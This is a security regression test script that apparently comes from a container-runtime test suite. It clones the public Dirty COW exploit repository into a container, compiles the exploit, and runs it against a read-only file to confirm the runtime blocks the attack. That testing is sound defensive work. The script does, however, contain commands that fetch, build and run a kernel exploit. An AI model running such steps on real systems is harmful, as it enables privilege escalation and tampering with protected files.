github.com/dmaizel/tests@v0.0.0-20210728163746-cae6a2d9cee8/pentest/dirtycow.sh

github.com/dmaizel/tests@v0.0.0-20210728163746-cae6a2d9cee8/pentest/dirtycow.sh (about)

     1  #!/bin/bash
     2  #
     3  # Copyright (c) 2018 Intel Corporation
     4  #
     5  # SPDX-License-Identifier: Apache-2.0
     6  #
     7  
     8  source "$(dirname $0)/lib.sh"
     9  
    10  container_name="dirtycow"
    11  runtime=${RUNTIME:-kata-runtime}
    12  test_repo="https://github.com/dirtycow/dirtycow.github.io"
    13  test_dir="/root/dirtycow"
    14  test_file="$test_dir/test"
    15  test_file_content="Hello"
    16  dirty_file_content="pwned"
    17  
    18  finish() {
    19  	docker rm -f "$container_name"
    20  }
    21  trap finish EXIT
    22  
    23  # Run a gcc container
    24  docker run --runtime="$runtime" --name="$container_name" -dti gcc bash
    25  
    26  # Turning off periodic writeback makes exploit stable
    27  # This should fail inside a container
    28  docker exec "$container_name" bash -c "echo 0 > /proc/sys/vm/dirty_writeback_centisecs"
    29  [ $? == 0 ] && die "Turned off periodic writeback"
    30  
    31  # Clone dirtycow repo
    32  docker exec "$container_name" git clone "$test_repo" "$test_dir"
    33  
    34  # Create and set as readonly the test file
    35  docker exec "$container_name" bash -c "echo $test_file_content > $test_file; chmod 0404 $test_file"
    36  
    37  # Build dirtycow
    38  docker exec -w "$test_dir" "$container_name" gcc -pthread dirtyc0w.c -o dirtyc0w
    39  
    40  # Run dirtycow
    41  docker exec -w "$test_dir" "$container_name" ./dirtyc0w "$test_file" "$dirty_file_content"
    42  
    43  # Check if test file was modified
    44  docker exec -w "$test_dir" "$container_name" grep -q "$test_file_content" "$test_file"
    45  [ $? == 1 ] && die "Modified read only file"
    46  
    47  exit 0